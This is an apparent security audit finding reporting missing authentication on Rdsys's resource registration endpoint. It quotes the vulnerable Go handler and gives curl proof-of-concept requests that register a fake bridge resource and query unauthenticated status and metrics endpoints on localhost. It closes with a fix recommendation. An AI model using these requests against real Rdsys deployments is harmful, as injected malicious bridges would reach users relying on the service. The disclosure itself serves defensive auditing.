Missing Authentication at Resource Registration
While auditing the source code of the Rdsys, it is noticed that the Rdsys backend has missing authentication for the resource registration endpoint. This allows an adversary to register arbitrary malicious resources which will be distributed to the users.
The following snippet of code shows the affected code where the resource registration endpoint does not have any kind of authentication checks as compared to the other endpoints.
Affected file: rdsys/internal/backend.go
Affected code:
func (b *BackendContext) resourcesHandler(w http.ResponseWriter, r *http.Request) {
switch r.Method {
[...]
case http.MethodPost:
if r.URL.Path == b.Config.Backend.ResourcesEndpoint {
b.postResourcesHandler(w, r)
[...]
}
func (b *BackendContext) postResourcesHandler(w http.ResponseWriter, req *http.Request) {
body, err := ioutil.ReadAll(req.Body)
[...]
rTypes := map[string]struct{}{}
for _, r := range rs {
b.Resources.Add(r)
rTypes[r.Type()] = struct{}{}
log.Printf("Added %s's %q resource to collection.", req.RemoteAddr, r.Type())
}
for rType := range rTypes {
b.rStore.Save(rType)
}
[...]
}The aforementioned issue can be reproduced by executing the following cURL request.
PoC:
curl http://localhost:7100/resources -i --data '[{"type": "obfs2", "address": "1.2.3.2", "port": 1235, "fingerprint":"10282810115283F99ADE5CFE42D49644F45D715D"}]' -XPOST
# Other endpoints which are missing authentication
curl -i -s -k -X $'GET' \
-H $'Host: localhost:7100' \
$'http://localhost:7100/status?id=10282810115283F99ADE5CFE42D49644F45D715D'
curl -i -s -k -X $'GET' \
-H $'Host: localhost:7100' \
$'http://localhost:7100/rdsys-backend-metrics'To address the issue, it is strongly advised to implement robust authentication mechanisms for all endpoints, with particular attention paid to the registration of resources. This will help to ensure that only authorized users are able to register resources, thereby reducing the risk of unauthorized access.